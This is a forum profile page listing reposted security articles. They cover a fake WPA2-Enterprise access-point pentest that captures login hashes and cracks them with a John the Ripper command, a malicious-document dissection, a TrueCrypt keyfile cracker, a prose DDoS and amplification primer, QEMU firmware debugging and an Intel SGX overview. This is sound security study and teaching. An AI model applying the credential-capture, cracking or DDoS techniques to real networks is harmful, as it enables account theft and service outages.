Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. [h=1]D-Link's new routers look crazy, but they're seriously fast[/h] by Steve Dent | @stevetdent | January 5th 2015 at 4:57 am D-Link has just jumped the router shark with its latest AC5300, AC3200 and AC3100 Ultra Performance models. On top of speeds up to 5.3Gbps for the AC5300 model, the 802.11ac devices feature, um, striking looks that hopefully won't frighten small children or animals. D-Link calls the models "attractive" with a "modern form-factor for today's homes," and we'd agree -- provided you live in some kind of rouge-accented spaceship. Performance-wise, however, the new models are definitely drool-worthy, thanks to 802.11ac tri-band beamforming speeds between 3.1- and 5.3Gbps, along with gigabit ethernet, high power antennas and onboard USB 3.0 ports. You can control the devices with a smartphone or tablet, and D-Link also outed an optional DWA-192 USB 3.0 adapter, which connects to laptops and PCs to give them an 802.11ac connection. The AC3200 model will run $310 and is available now from NewEgg, while the rest of the pricing and models will come next quarter. On top of the wireless stuff, D-Link also announced new PowerLine HomePlug kits, with speeds up to 2Gbps. The company says the DHP-701AV (2Gbps) and DHP-601AV (1Gbps) adapters use the fastest two wires in a typical three-wire power installation with pushbutton connection for ease of installation and security. Both kits comes with two adapters and will run $130 (DHP-701AV) and $80 (DHP-601AV), with both arriving later this quarter. Sursa: D-Link's new routers look crazy, but they're seriously fast
  2. [h=3]Professionally Evil: This is NOT the Wireless Access Point You are Looking For[/h] I was recently conducting a wireless penetration test and was somewhat disappointed (but happy for our client) to find that they had a pretty well configured set of wireless networks. They were using WPA2 Enterprise and no real weaknesses that I could find in their setup. After conducting quite a bit of analysis on network captures and looking for any other source of weakness, I finally concluded that I wasn't going to get anywhere with the approaches I was taking. Rather than giving up and leaving it at that, I decided to go after the clients using the network and see what I could get them to do. I had a a laptop and a number of iOS, Android and Palm devices at my disposal, so how would they respond to a fake access point? I decided to setup a fake access point (AP) using a matching SSID, which we will call "FOOBAR" for our purposes. I downloaded the latest version of hostapd (2.0 as of this post) and set it up to be use WPA2 Enterprise and configured Freeradius-WPE as the fake authentication system. The goal was to have a client connect to my evil AP and then give me their credentials. Freeradius-WPE came pre-installed on my laptop running Backtrack, so no real work there. About all I did was install a valid SSL certificate for use by the radius daemon. Unfortunately, I could never get Freeradius-WPE to handle the CA certificate chain correctly and that had an impact on my attack later on. If you don't care about a valid TLS certificate, then start Freeradius-WPE on Backtrack by running "radius -X". The -X will cause the daemon to setup self signed TLS certificates automatically. With that done, I moved on to installing hostapd. At first I installed hostapd from the apt repositories already setup in Backtrack. Unfortunately, there was an issue with that version and my setup, which caused it to fail at startup. To get around this, I downloaded and installed the app from source and the problem went away. Below is my hostapd.conf file. This config is largely based off of some searches for default configurations of hostapd and then I researched the settings that I needed to have to get WPA2 Enterprise working. The critical pieces to doing that were setting wpa=1 and then setting wpa_key_mgmt=WPA-EAP. I also made sure that hostapd was pointed to my radius server and had the correct password to access it. Last, I set my SSID to match our client's environment (or in in this example used "FooBar"). To get hostapd running, I ran "hostapd hostapd.conf" and I was up and running. I picked up my test iPhone and found FooBar in my list of available networks. When I selected this network, I was prompted for my test account's username and password. So far so good... Then I hit a major snag in making this attack invisible. The SSL certificate chain was not being presented properly, so my cert showed up as invalid. After a bit of troubleshooting and a dwindling testing window for this attack, I finally had to relegate fixing this to later research. And honestly, if someone was presented with an invalid certificate the chances are pretty high I'd get someone to click on it in spite of this warning. I accepted this warning and proceeded on with my test. The credentials were sent to my fake AP and Freeradius-WPE captured my credentials. The password doesn't get sent across, but that's hardly an issue in this case. I'm using a really dumb password for our example and John the Ripper with a good password list will have no issues with it. All we need to do is take the username and hashes and put them into a text file in the format that john expects for NETNTLM hashes. This involves removing all the colons in the hashes and getting them delimited properly for the expected format. My two entries end up looking like this in my capture file. Finally, I turn John loose on the hashes by running "john -w:/pentest/passwords/wordlists/rockyou.txt --format=NETNTLM hashes.txt". As expected, the hashes broke within seconds. At this point the attacker wins by using these credentials to log into the targeted network and proceeds with whatever the next step in their attack is. There were a few steps to get to this point, but really it was pretty straight forward. Happy pen testing! Jason Wood is a Senior Security Consultant with Secure Ideas. If you are in need of a penetration test or other security consulting services you can contact him at jason@secureideas.com or visit the Secure Ideas - Professionally Evil site for services provided. Posted by Jason Wood at 9:18 PM Sursa: Secure Ideas: Professionally Evil!: Professionally Evil: This is NOT the Wireless Access Point You are Looking For
  3. What It Looks Like: Disassembling A Malicious Document I recently analyzed a malicious document, by opening it on a virtual machine; this was intended to simulate a user opening the document, and the purpose was to determine and document artifacts associated with the system being infected. This dynamic analysis was based on the original analysis posted by Ronnie from PhishMe.com, using a copy of the document that Ronnie graciously provided. After I had completed the previous analysis, I wanted to take a closer look at the document itself, so I disassembled the document into it's component parts. After doing so, I looked around on the Internet to see if there was anything available that would let me take this analysis further. While I found tools that would help me with other document formats, I didn't find a great deal that would help me this particular format. As such, I decided to share what I'd done and learned. The first step was to open the file, but not via MS Word...we already know what happens if we do that. Even though the document ends with the ".doc" extension, a quick look at the document with a hex editor shows us that it's format is that of the newer MS Office document format; i.e., compressed XML. As such, the first step is to open the file using a compression utility, such as 7Zip, as illustrated in figure 1. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 1: Document open in 7Zip[/TD] [/TR] [/TABLE] As you can see in figure 1, we now have something of a file system-style listing that will allow us to traverse through the core contents of the document, without actually having to launch the file. The easiest way to do this is to simply extract the contents visible in 7Zip to the file system. Many of the files contained in the exported/extracted document contents are XML files, which can be easily viewed using viewers such as Notepad++. Figure 2 illustrates partial contents for the file "docProps/app.XML". [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 2: XML contents[/TD] [/TR] [/TABLE] Within the "word" folder, we see a number of files including vbaData.xml and vbaProject.bin. If you remember from PhishMe.com blog post about the document, there was mention of the string 'vbaProject.bin', and the Yara rule at the end of the post included a reference to the string “word/_rels/vbaProject.bin”. Within the "word/_rels" folder, there are two files...vbaProject.bin.rels and document.xml.rels...both of which are XML-format files. These documents describe object relationships within the overall document file, and of the two, documents.xml.rels is perhaps the most interesting, as it contains references to image files (specifically, "media/image1.jpg" and "media/image2.jpg"). Locating those images, we can see that they're the actual blurred images that appear in the document, and that there are no other image files within the extracted file system. This supports our finding that clicking the "Enable Content" button in MS Word did nothing to make the blurred documents readable. Opening the word/vbaProject.bin file in a hex editor, we can see from the 'magic number' that the file is a structured storage, or OLE, file format. The 'magic number' is illustrated in figure 3. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 3: vbaProject.bin file header[/TD] [/TR] [/TABLE] Knowing the format of the file, we can use the MiTeC Structured Storage Viewer tool to open this file and view the contents (directories, streams), as illustrated in figure 4. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 4: vbaProject[/TD] [/TR] [/TABLE] Figure 5 illustrates another view of the file contents, providing time stamp information from the "VBA" folder. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 5: Time stamp information[/TD] [/TR] [/TABLE] Remember that the original PhishMe.com write-up regarding the file stated that the document had originally been seen on 11 Dec 2014. This information can be combined with other time stamp information in order to develop an "intel picture" around the infection itself. For example, according to VirusTotal, the malicious .exe file that was downloaded by this document was first seen by VT on 12 Dec 2014. The embedded PE compile time for the file is 19 June 1992. While time stamps embedded within the document itself, as well as the PE compile time for the 'msgss.exe' file may be trivial to modify and obfuscate, looking at the overall wealth of information provides analysts with a much better view of the file and its distribution, than does viewing any single time stamp in isolation. If we continue navigating through the structure of the document, and go to the VBA\ThisDocument stream (seen in figure 4), we will see references to the files (batch file, Visual Basic script, and Powershell script) that were created within the file system on the infected system. Summary My goal in this analysis was to see what else I could learn about this infection by disassembling the malicious document itself. My hope is that the process discussed in this post will serve as an initial roadmap for other analysts, and be extended in the future. Tools Used 7Zip Notepad++ Hex Editor (UltraEdit) MiTeC Structured Storage Viewer Resources Lenny Zeltser's blog - Analyzing Malicious Documents Cheat Sheet Virus Bulletin presentation (from 2009) Kahu Security blog post - Dissecting a Malicious Word document Document-Analyzer.net - upload documents for analysis Posted by Harlan Carvey at 8:37 AM Sursa: Windows Incident Response: What It Looks Like: Disassembling A Malicious Document
  4. TrueCrypt key file cracker. [h=1]Usage[/h] python tckfc.py [-h] [-c [COMBINATION]] keyfiles tcfile password mountpoint keyfiles: Possible key files directory tcfile: TrueCrypt encrypted file password: Password for TrueCrypt file mountpoint: Mount point [h=1]Example[/h] mkdir mnt cp a.pdf keys/ cp b.doc keys/ cp c.txt keys/ cp d.jpg keys/ cp e.gif keys/ python tckfc.py keys/ encrypted.img 123456 mnt/ Sursa: https://github.com/Octosec/tckfc
  5. [h=1]Distributed Denial Of Service (DDoS) for Beginners[/h] Distributed Denial Of Service, or DDoS, is an attack in which multiple devices send data to a target device (usually a server), with the hope of rendering the network connection or a system application unusable. There are many forms of DDoS attack, but almost all modern attacks are either at Layer 4 (The Transport Layer) or Layer 7 (The Application Layer), I'll cover both of these in depth. Although DDoS attacks can occur between almost any devices, I'll refer to the attacker as the client and the victim as the server. [h=2]Layer 4 (Transport Layer)[/h] TCP, USD, SCTP, DCCP and RSVP are all examples of Layer 4 protocols; however, we'll focus on UDP as this is most commonly utilized for DDoS attacks. UDP is generally preferred over TCP based attacks because TCP requires a connection to be made before any data can be send; if the server or firewall refuses the connection, no data can be sent, thus the attack cannot proceed. UDP allows for the client to simply send data to the server without first making a connection, It's similar to the way in which mail reaches your house without your authorizartion, you can do whatever you want with it once you receive it, but you are still going to receive it. This is why software firewalls are useless against UDP attacks, because by the time the packet has reached your server, it's already traveled through your server's datacenter. If the datacenter's router is on a 1gb/s connection and more than 1gb/s of UDP packets are being sent, the router is going to be physically unable to process them all, rendering your server inaccessible (regardless of if the server processes the packets or not). The basic idea of UDP is to saturate the connection, rather than over-stress the server by sending it too much data. If the attack is powerful enough, it won't even need to reach the server, it can simply overload an upstream device responsible for routing data to the target server (or even that region of the datacenter). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]The worst datacenter you ever saw.[/TD] [/TR] [/TABLE] If we consider our hypothetical, inaccurate and oversimplified datacenter: We have a 3 Gb/s line connecting section 1 of the datacenter to the rest of the network, that 3 Gb/s line is then split into 3x 1 Gb/s lines for each of the 3 racks, each rack contains 3 servers, so each 1 Gb/s line is split into 3x 333 Mb/s lines. Let's assume all 3 servers in rack 1 have the world's best firewall; it might protect them all from DDoS, but if the attack exceeds 333 MB/s, the server will be offline regardless, if the attack exceeds 1 Gb/s the rack will be offline, and if the attack exceeds 3 GB/s the entire section will be offline. No matter how good the server's firewall is, the server will be offline if the upstream routers cripple under the load, it's theoretically possible to take offline an entire datacenter or even a whole country by sending a large enough attack to one server withing that datacenter/country. Mitigation of UDP attacks can only be performed by the datacenter themselves by deploy specialized routers (commonly known as hardware firewalls) at strategical points within the network. The aim is to filter out some of the DDoS at stronger parts of the network, before it reaches the downstream routers. A common method of "mitigation" among lazy ISPs is to simply stop routing any traffic to the IP address being attacked (known as null routing), this results in the server being offline until the datacenter staff decide otherwise, meaning the attacker can stop attacking and enjoy a nice nap. [h=2]Layer 7 (Application Layer)[/h] Layer 7 DDoS attacks are probably the easiest to carry out in terms of resources needed, because the idea is not to over-saturate the network, but to simply lock up an application on the server. Due to the fact the attack isn't taking offline the whole server, it's easy for the sysadmin to login and begin to mitigation. An example of a Layer 7 attack against a website would be to constantly send GET requests to a page which performs lots of SQL queries; most SQL servers have a limit on the amount of queries they can process at one time, any more and the server will have to start denying requests, preventing legitimate clients from using the website. Attackers don't even need to flood the server with requests, it's possible to simply overload the application by maintaining open connections (without sending tonnes of data). Slowloris is an example of such attack where the attacker opens connections to the HTTP server and sends HTTP requests bit by bit, as slowly as possible. The server cannot process a request until it's complete, so it just waits indefinitely until the entire request has been sent; once the maximum number of clients is hit, the server will just ignore any new clients until it's done with the old (of course the old clients are just going to continue adding useless data to the HTTP request, keeping the connection busy for as long as they can). [h=2]DDoS Amplification[/h] DDoS amplification is nothing new, it has actually been around so long that Microsoft patched their OS to try and prevent attacks (I'll go over this later). Amplification attacks are nearly always UDP because it does not require a connection, UDP packets operate a lot like a letter in the mail: they have a return address (known as the source address) in which the server will reply to, but as with any letter, there is no guarantee the return address matches that of whoever sent it. For an amplification attack to work, we first need a service that works over UDP and has a response message that is larger than the request message. A good example of this is a DNS query: the request to lookup the DNS is only about 60 bytes, but the UDP DNS response can be as large as 4000 bytes (due to long txt records), that's a 1:67 amplification ratio. All the attacker needs to do is find a DNS that when queried will result in a large response, then send a query to said DNS with the victims IP and the source address, resulting in the DNS server sending the response to the victim instead of the attacker. Due to the size different between a DNS request and DNS response, an attacker can easily transform a botnet capable of outputting 1 Gb/s worth of requests into 60 Gb/s DDoS attack, this is a huge problem. In order to mitigate these kinds of attacks, Microsoft introduced an update to the windows network stack in XP SP2, which would prevent the system from sending UDP packets with a source address other than its own. Some ISPs took a similar approach by inspecting outgoing UDP packets and dropping any which did not contain a source address owned by the sender. As a result of such measures, Amplified DDoS attacks are primarily sent from linux servers running in a datacenter that does not implement source address verification. [h=2]Who Can Perform DDoS Attacks?[/h] In the past DDoS attacks were only for seasoned hackers with large botnets under their control, due to the fact home computers don't have much bandwidth, requiring hundreds, if not thousands, of them to take offline a single server. Nowadays people can just buy (or hack) servers and use them to perform attacks; a botnet of as little as 2 servers can take offline most website. An attacker doesn't even need to acquire their own servers, there are many services utilizing bought/hacked servers to perform DDoS attacks for as little as a $5/month subscription fee. It is also believed that Lizard Squad were able to take offline massive services such as PSN and XBL by abusing the Google Cloud free trial, using the virtual servers as DDoS bots. Sursa: http://www.malwaretech.com/2015/01/distributed-denial-of-service-ddos-for.html
  6. Remote Debugging with QEMU and IDA Pro It's often the case, when analyzing an embedded device's firmware, that static analysis isn't enough. You need to actually execute a binary you're analyzing in order to see how it behaves. In the world of embedded Linux devices, it's often fairly easy to put a debugger on the target hardware for debugging. However it's a lot more convenient if you can run the binary right on your own system and not have to drag hardware around to do your analysis. Enter emulation with QEMU. An upcoming series of posts will focus on reverse engineering the UPnP daemon for one of Netgear's more popular wireless routers. This post will describe how to run that daemon in system emulation so that it can analyzed in a debugger. Prerequisites First, I'd recommend reading the description I posted of my workspace and tools that I use. Here's a link. You'll need an emulated MIPS Linux environment. For that, I'll refer readers to my previous post on setting up QEMU. You'll also need a MIPS Linux cross compiler. I won't go into the details of setting this up because cross compilers are kind of a mess. Sometimes you need an older toolchain, and other times you need a newer toolchain. A good starting point is to build both big endian and little endian MIPS Linux toolchains using the uClibc buildroot project. In addition to that, whenever I find other cross compiling toolchains, I save them. A good source of older toolchains is the GPL release tarballs that vendors like D-Link and Netgear make available. Once you have a cross compiling toolchain for your target architecture, you'll need to build GDB for that target. At the very least, you'll need gdbserver statically compiled for the target. If you want to remotely debug using GDB, you'll need gdb compiled to run on your local architecture (e.g., x86-64) and to debug your target architecture (e.g., mips or mipsel). Again, I won't go into building these tools, but if you have your toolchains set up, it shouldn't be too bad. I use IDA Pro, so that's how I'll describe remote debugging. However, if you want to use gdb check out my MIPS gdbinit file: https://github.com/zcutlip/gdbinit-mips Emulating a Simple Binary Assuming you've gotten the tools described above set up and working properly, you should now be able to SSH into your emulated MIPS system. As described in my Debian MIPS QEMU post, I like to bridge QEMU's interface to VMWare's NAT interface so I can SSH in from my Mac, without first shelling into my Ubuntu VM. This also allows me to mount my Mac's workspace right in the QEMU system via NFS. That way whether I'm working in the host environment, in Ubuntu, or in QEMU, I'm working with the same workspace. zach@malastare:~ (130) $ ssh root@192.168.127.141 root@192.168.127.141's password: Linux debian-mipsel 2.6.32-5-4kc-malta #1 Wed Jan 12 06:13:27 UTC 2011 mips root@debian-mipsel:~# mount /dev/sda1 on / type ext3 (rw,errors=remount-ro) malastare:/Users/share/code on /root/code type nfs (rw,addr=192.168.127.1) root@debian-mipsel:~# cd code root@debian-mipsel:~/code# Once shelled into your emulated system, cd into the extracted file system from your device's firmware. You should be able to chroot into the firmware's root file system. You need to use chroot since the target binary is linked against the firmware's libraries and likely won't work with Debian's shared libraries. root@debian-mipsel:~# cd code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs/ root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# file ./bin/ls ./bin/ls: symbolic link to `busybox' root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# file ./bin/busybox ./bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked (uses shared libs), stripped root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot . /bin/ls -l /bin/busybox -rwxr-xr-x 1 10001 80 276413 Sep 20 2012 /bin/busybox root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# In the above example, I have changed into the root directory of the extracted file system. Then using the file command I show that busybox is a little endian MIPS executable. Then I chrooted into the extracted root directory and ran bin/ls, which is a symlink to busybox. If you attempt to simply start a chrooted shell with "chroot .", it won't work. Your user's default shell is bash, and most embedded devices don't have bash. root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot . chroot: failed to run command `/bin/bash': No such file or directory root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# Instead you can chroot and execute bin/sh: root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot . /bin/sh BusyBox v1.7.2 (2012-09-20 10:26:08 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # # # exit root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# Hardware Workarounds Even with the necessary tools and emulation environment set up and working properly, you can still run into roadblocks. Although QEMU does a pretty good job of emulating the core chipset, including the CPU, there is often hardware the binary you're trying to run is expecting that QEMU can't provide. If you try to emulate something simple like /bin/ls, that will usually work fine. But something more complicated such as the UPnP daemon will almost certainly have particular hardware dependencies that QEMU isn't going to satisfy. This is especially true for programs whose job it is to manage the embedded system's hardware, such as turning wireless adapters on or off. The most common problem you will run into when running system services such as the web server or UPnP daemon is the lack of NVRAM. Non-volatile RAM is usually a partition of the device's flash storage that contains configuration parameters. When a daemon starts up, it will usually attempt to query NVRAM for its run-time configuration. Sometimes a daemon will query NVRAM for tens or even hundreds of parameters. To work around the lack of NVRAM in emulation, I wrote a library called nvram-faker. The nvram-faker library should be preloaded using LD_PRELOAD when you run your binary. It will intercept calls to nvram_get(), normally provided by libnvram.so. Rather than attempting to query NVRAM, nvram-faker will query an INI-style configuration file that you provide. The included README provides a more complete description. Here's a link to the project: https://github.com/zcutlip/nvram-faker Even with NVRAM solved, the program may make assumptions about what hardware is present. If that hardware isn't present, the program may not run or, if it does run, it may behave differently than it would on the target hardware. In this case, you may need to patch the binary. The specifics of binary patching vary from one situation to another. It really depends on what hardware is expected, and what the behavior is when it is absent. You may need to patch out a conditional branch that is taken if hardware is missing. You may need to patch out an ioctl() to a special device if you're trying to substitute a regular file for reading and writing. I won't cover patching in detail here, but I did discuss it briefly in my BT HomeHub paper and the corresponding talk I gave at 44CON. Here is a link to those resources: http://shadow-file.blogspot.com/2013/09/44con-resources.html Attaching the Debugger Once you've got your binary running in QEMU, it's time to attach a debugger. For this, you'll need gdbserver. Again, this tool should be statically compiled for your target architecture because you'll be running it in a chroot. You'll need to copy it into the root directory of the extracted filesystem. # ./gdbserver Usage: gdbserver [OPTIONS] COMM PROG [ARGS ...] gdbserver [OPTIONS] --attach COMM PID gdbserver [OPTIONS] --multi COMM COMM may either be a tty device (for serial debugging), or HOST:PORT to listen for a TCP connection. Options: --debug Enable general debugging output. --remote-debug Enable remote protocol debugging output. --version Display version information and exit. --wrapper WRAPPER -- Run WRAPPER to start new programs. --once Exit after the first connection has closed. # You can either attach gdbserver to a running process, or use it to execute your binary directly. If you need to debug initialization routines that only happen once, you'll want to do the latter. On the other hand, you may want to wait until the daemon forks. As far as I know there's no way to have IDA follow forked processes. You need to attach to them separately. If you do it this way, you can attach to the already running process from outside the chroot. The following shell script will execute upnpd in a chroot. If DEBUG is set to 1, it will attach to upnpd and pause for a remote debugging session on port 1234. #!/bin/sh ROOTFS="/root/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs" chroot $ROOTFS /bin/sh -c "LD_PRELOAD=/libnvram-faker.so /usr/sbin/upnpd" #Give upnpd a bit to initialize and fork into the background. sleep 3; if [ "x1" = "x$DEBUG" ]; then $ROOTFS/gdbserver --attach 0.0.0.0:1234 $(pgrep upnpd) fi You can create a breakpoint right before the call to recvfrom() and then verify the debugger breaks when you send upnpd an M-SEARCH packet. Then, in IDA, go to Process Options under the Debugger menu. Set "hostname" to the IP address of your QEMU system, and set the port to the port you have gdbserver listening on. I use 1234. Accept the settings, then attach to the remote debugging session with IDA's ctrl+8 hotkey. Hit ctrl+8 again to resume execution. You should be able to send an M-SEARCH packet[1] and see the debugger hit the breakpoint. There is obviously a lot more to explore, and there are lots of situations that can come up that aren't addressed here, but hopefully this gets you started. [1] I recommend Craig Heffner's miranda tool for UPnP analysis: https://code.google.com/p/miranda-upnp/ Posted by Zach Cutlip at 3:05:00 PM Sursa: http://shadow-file.blogspot.kr/2015/01/dynamically-analyzing-wifi-routers-upnp.html
  7. Intel® Software Guard Extensions (SGX): A Researcher’s Primer Monday January 5, 2015 tl;dr Intel SGX is a trusted execution environment which provides a reverse sandbox. It’s not yet available but those who have had access to the technology have shown some powerful applications in cloud use cases that on the face of it dramatically enhance security without the performance constraints of homomorphic encryption. However, there is enough small print to warrant both validation and defensive assessment activities when the technology becomes more generally available. Introduction There is a new set of features coming to Intel CPUs that have massive potential for cloud security and other applications such as DRM. However, as with all things that can be used for good there is also the potential for misuse. These features come in the guise of Software Guard Extensions (SGX). In this post we’ve collated what we know about the technology, what others have said about it and how it is being applied in real-world applications. What is SGX? To quote Intel: Intel® Software Guard Extensions (Intel® SGX) is a name for Intel Architecture extensions designed to increase the security of software through an “inverse sandbox” mechanism. In this approach, rather than attempting to identify and isolate all the malware on the platform, legitimate software can be sealed inside an enclave and protected from attack by the malware, irrespective of the privilege level of the latter. So in short this means we can create a secure enclave (or a Trusted Execution Environment – TEE – if you wish) at the CPU level which is protected from the OS upon which it is running. Architecturally Intel SGX is a little different from ARM TrustZone (TZ). With TZ we often think of a CPU which is in two halves i.e. the insecure world and the secure world. Communication with the secure world occurs from the insecure world via the SMC (Secure Monitor Call) instruction. In Intel SGX model we have one CPU which can have many secure enclaves (islands): Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 13 Intel SGX is like the Protected Processes Microsoft introduced in Windows Vista but with the added benefit that it is hardware enforced so that even the underlying OS kernel can’t tamper or snoop. Intel® and Third Party High-Level and Low-Level Background Material Intel provides a background as to the design goals of SGX in a series of three (currently) blog posts: Intel® SGX for Dummies (Intel® SGX Design Objectives) : September 2013, Matthew Hoekstra Intel® SGX for Dummies – Part 2 : June 2014, Matthew Hoekstra Intel® SGX for Dummies – Part 3 : September 2014, Matthew Hoekstra Three other useful resources from Intel on how SGX actually works come in the guise of: Innovative Instructions and Software Model for Isolated Execution: June 2013, Frank McKeen, Ilya Alexandrovich, Alex Berenzon, Carlos Rozas, Hisham Shafi, Vedvyas Shanbhogue and Uday Savagaonkar, Intel Corporation Intel® Software Guard Extensions(Intel® SGX) Instructions and Programming Model: June 2013, Frank McKeen, Ilya Alexandrovich, Alex Berenzon, Carlos Rozas, Vedvyas Shanbhogue and Uday Savagaonkar, Intel Corporation Intel® Software Guard Extensions(Intel® SGX): November 2013, Carlos Rozas, Intel Labs (given at CMU) Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002): October 2014 Intel® Software Guard Extensions Programming Reference Rev 1 (#329298-001) was published in September 2013 From the Microsoft Haven research (see later) we know that revision 2 of the SGX specifications resolved issues with: Exception handling: page faults and general protection faults were not reported in the enclave. Permitted instructions: CPUID, RDTSC and IRET where not permitted previously. Of these RDTSC and IRET now are. Thread-local storage: there were problems due to segment register usage which has been fixed. Finally a good third-party presentation on Intel SGX is from the Technische Universität Darmstadt, Germany in a lecture on embedded system security titled Trusted Execution Environments Intel SGX. It provides a good summary of the functionality and how key operations occur to save you wading through the programming manual. Previous Security Analysis While no CPUs with SGX are available nor any emulators/simulators (publically at least – see later in this post) others have passed initial comment on the potential security ramifications of SGX in both good and evil contexts over the past 18 months. Intel Software Guard Extensions (SGX) Is Mighty Interesting: July 2013, Rich Mogull - Discusses the positive applications against malware, hypervisors and potential to replace HSMs. Thoughts on Intel's upcoming Software Guard Extensions (Part 1): August 2013, Joanna Rutkowska – Initial high-level thoughts on the functionality provided and how it compliments existing Intel technologies. Thoughts on Intel's upcoming Software Guard Extensions (Part 2): September 2013, Joanna Rutkowska – Lower-level thoughts on good and bad applications for SGX. SGX: the good, the bad and the downright ugly: January 2014, Shaun Davenport & Richard Ford - Application of SGX in the Real World So how far has the application of SGX in the real world come? As already mentioned given the lack of CPU support the ability to experiment with the technology has been limited to the few. Two examples of groups who have been afforded access are Microsoft Research and the United States Air Force Academy. The application of the SGX by these two groups is quite radically different. Microsoft have focused on server side applications whilst the Air Force Academy seem to be focusing on client side use cases. Secure Enclaves-Enabled Technologies: Browser Extension According to a 2014 National Security Innovation Competition Proceedings Report on Secure Enclaves-Enabled Technologies from the United States Air Force Academy, there is at least one company who has access to the technology and has funding: Secure Enclaves-Enabled Technologies is a digital security firm to be launched in the coming year. It is born from a unique relationship between Intel Labs and the Department of Homeland Security seeking to develop a revolutionary solution to cyber security problems Then they reveal their intended application of SGX: SE Enabled Technologies seeks to exploit the capabilities of SGX through the creation of software solutions. Currently, we are seeking to compliment Intel’s hardware solution through the use of a browser extension application. Using the browser extension, we can offer a wide array of security solutions from secure storage and transmission of documents to secure video streaming. As of April 12, 2014 according to the Colorado Springs Undergraduate Research Forum proceedings things had moved on: In today’s increasingly digital world, more and more sensitive information is stored electronically, and more and more often this information comes under attack. With the continual evolution of offensive attack techniques, the need for more impressive defensive counter-measures is becoming apparent. As the requisite to fill this capability gap grows, so does the opportunity for businesses. Replacing the need for a countermeasure, recent developments in micro-processer technology have created a veritable impenetrable fortress to be placed inside modern day computer systems. The answer lies in Secure Enclaves - Enabled Technology, a software company that utilizes Intel Labs’ revolutionary Software Guard Extensions technology. Instead of relying on encryption and software, this technology is hardware-based, and is so secure that an NSA Red Team could not crack it. This technology has tremendous application to both government and private organizations concerned about security. For completing a proof of concept case with the Department of Veterans’ Affairs, Secure Enclaves – Enabled Technologies will receive $500,000 that it will channel into the development of a commercially available security software package. Further details around Secure Enclaves-Enabled Technologies can be found in the 2014 National Security Innovation Competition proceedings (page 57 onwards) including these points of interest: SGX will be a standard component of Intel’s chipsets beginning in 2015. However, new software must be developed or current software must be adapted in order to have the ability to utilize the new set of instructions provided by the chipset. Without this critical software development, the cyber security solution afforded by SGX will lie dormant. Microsoft: VC3 VC3 was published in October 2014 in the paper titled VC3: Trustworthy Data Analytics in the Cloud, for which the abstract states: We present VC3, the first practical framework that allows users to run distributed MapReduce computations in the cloud while keeping their code and data secret, and ensuring the correctness and completeness of their results. VC3 runs on unmodified Hadoop, but crucially keeps Hadoop, the operating system and the hypervisor out of the TCB; thus, confidentiality and integrity are preserved even if these large components are compromised. VC3 relies on SGX processors to isolate memory regions on individual computers, and to deploy new protocols that secure distributed MapReduce computations. VC3 optionally enforces region self-integrity invariants for all MapReduce code running within isolated regions, to prevent attacks due to unsafe memory reads and writes An interesting aspect of the Microsoft VC3 work is the adversary model they considered: We consider a powerful adversary who may control the entire software stack in a cloud provider’s infrastructure, including hypervisor and OS. The adversary may also record, replay, and modify network packets. The adversary may also read or modify data after it left the processor using probing, DMA, or similar techniques. Our adversary may in particular access any number of other jobs running on the cloud, thereby accounting for coalitions of users and data center nodes. Further, we assume that the adversary is unable to physically open and manipulate at least those SGX-enabled processor packages that reside in the cloud provider’s data centers. Microsoft: Haven Haven was presented at USENIX in October 2014 in a paper titled Shielding applications from an untrusted cloud with Haven (Slides etc. are available from USENIX.), for which the abstract states: Our prototype, Haven, is the first system to achieve shielded execution of unmodified legacy applications, including SQL Server and Apache, on a commodity OS (Windows) and commodity hardware. Haven leverages the hardware protection of Intel SGX to defend against privileged code and physical attacks such as memory probes, but also addresses the dual challenges of executing unmodified legacy binaries and protecting them from a malicious host. This work motivated recent changes in the SGX specification. Further Applications Two other papers that are related to how SGX can be applied are (both from Intel): Using Innovative Instructions to Create Trustworthy Software Solutions Innovative Technology for CPU Based Attestation and Sealing Finally there was some speculation that Ubuntu’s LXD announced early November 2014 might use SGX: Ubuntu do state that: We’re working with silicon companies to ensure hardware-assisted security and isolation for these containers, just like virtual machines today. Emulator and CPU Support Status By now you will no doubt be salivating at the prospect of SGX and want to proto-type: New first of its kind malware which uses SGX in preparation for BlackHat USA 2015 OR A Soft-HSM OR DRM extensions which use SGX So what is the status of emulator and CPU support for SGX? Emulators Alas no emulators are available to public, although one does exist inside of Intel and shared with select partners. In June 2014 Intel said in the comments section of the Intel® SGX for Dummies (Intel® SGX Design Objectives) blog post: Intel is not ready to announce plans for availability of SGX emulation platform yet, but this forum will be updated when we are ready. So how did Microsoft develop their VC3 and Haven proto-types? In the Microsoft VC3 paper from February 2014 Microsoft said: We successfully tested our implementation in an SGX emulator provided by Intel More interestingly they then go on to say: However, since that emulator is not performance accurate, we have implemented our own software emulator for SGX. Our goal was to use 